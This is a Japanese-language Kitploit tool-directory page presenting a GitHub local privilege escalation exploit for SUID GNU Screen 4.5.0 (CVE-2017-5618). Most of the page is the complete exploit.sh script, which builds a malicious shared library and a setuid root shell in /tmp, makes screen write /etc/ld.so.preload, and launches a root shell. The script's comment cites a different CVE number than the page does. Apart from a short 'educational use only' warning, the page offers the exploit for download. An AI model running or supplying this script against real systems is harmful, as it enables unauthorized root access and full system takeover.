Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — GNU Screen 4.5.0(CVE-2017-5618)向けのローカル権限昇格エクスプロイト。ロギング機能の脆弱性を悪用して共有ライブラリの読み込みをハイジャックし、ld.so.preloadの操作を介してrootアクセスを獲得します。影響を受けるバージョン: Screen 4.5.0(SUID)修正済みバージョン: Screen 4.6.0+ | Kitploit
ツール/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
特権昇格エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイトラボと実践
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

GNU Screen 4.5.0(CVE-2017-5618)向けのローカル権限昇格エクスプロイト。ロギング機能の脆弱性を悪用して共有ライブラリの読み込みをハイジャックし、ld.so.preloadの操作を介してrootアクセスを獲得します。影響を受けるバージョン: Screen 4.5.0(SUID)修正済みバージョン: Screen 4.6.0+

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3211ヶ月前未レビュー

GNU Screen 4.5.0 ローカル権限昇格エクスプロイト (CVE-2017-5618)

📌 概要

GNU Screen 4.5.0 向けのローカル権限昇格エクスプロイトで、共有ライブラリのロードを乗っ取り、ld.so.preload の操作を介して root アクセス を獲得します。

🔧 技術的詳細

脆弱性: CVE-2017-5618 種類: ld.so.preload を介した共有ライブラリのハイジャック 影響を受けるバージョン: GNU Screen 4.5.0 のみ 修正済みバージョン: GNU Screen 4.6.0+

🎪 脆弱性サーカス

CVE: 2017-5618 🎯

バグ: Screen 4.5.0 は危険な権限でログファイルを作成します

仕組み: /etc/ld.so.preload を作成させて、悪意のあるライブラリをロードさせます

ペイロード: 即座に root シェルを取得! 🐚

スクリプト 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

スクリーンショット

脆弱性のある Screen バージョンを確認中。

Screen version detected

ファイルを作成し、必要な権限を付与中。

Making

root アクセスを獲得。

Root

root シェルを取得 - システム全体を制御

⚠️ 警告ラベル

教育目的でのみ使用してください! ⚠️ スクリプトキディにならないでください - このツールは、自分が所有するシステム、または明示的なテスト許可を得たシステムでのみ使用してください。

テスト済み環境

TryHackMe KOTH Room - Food

ツールをダウンロード